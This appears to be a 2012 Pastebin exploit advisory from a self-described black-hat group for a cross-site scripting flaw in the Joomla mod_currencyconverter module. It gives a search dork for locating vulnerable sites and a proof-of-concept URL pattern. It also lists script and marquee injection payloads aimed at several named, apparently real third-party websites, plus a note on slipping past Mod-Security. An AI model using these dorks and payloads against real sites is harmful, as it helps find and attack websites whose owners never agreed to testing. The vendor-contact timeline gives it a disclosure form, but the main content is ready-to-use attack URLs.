API tools faq
paste
Advertisement
cybercode

CMS Joomla! Exploits

cybercode
Feb 24th, 2012
673
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.06 KB | None | 0 0
raw download clone embed print report
  1. ###############################################################################
  2. #                      More exploits:   http://adf.ly/5EHaQ !                 #
  3. ###############################################################################
  4. # Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
  5. # Date: 2012-02-02 [GMT +7]
  6. # Author: BHG Security Center
  7. # Software Link: http://joomla.org
  8. # Dork: inurl:/includes/convert.php?from=
  9. # Tested on: ubuntu 11.04
  10. # CVE : -
  11. -----------------------------------------------------------------------------------------
  12. Joomla modules (mod_currencyconverter) XSS Vulnerability
  13. -----------------------------------------------------------------------------------------
  14.  
  15. Author : BHG Security Center
  16. Date : 2012-02-02
  17. Location : Iran
  18. Web : http://Black-Hg.Org
  19. Critical Lvl : Medium
  20. Where : From Remote
  21. My Group : Black Hat Group #BHG
  22. ---------------------------------------------------------------------------
  23.  
  24. PoC/Exploit:
  25. ~~~~~~~~~~
  26. ------------- ( Cross Site Scripting ) ~
  27.  
  28. ~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
  29.  
  30.    ------------- ( Demo Vulnerability ) ~
  31.  
  32.    Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
  33.    
  34.    Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
  35.  
  36.    Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
  37.    
  38.    Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
  39.    
  40.    
  41. Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
  42.  
  43.  
  44. Timeline:
  45. ~~~~~~~~~
  46. - 29 - 01 - 2012 bug found.
  47. - 01 - 02 - 2012 vendor contacted, but no response.
  48. - 02 - 02 - 2012 Advisories release.
  49.  
  50. ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!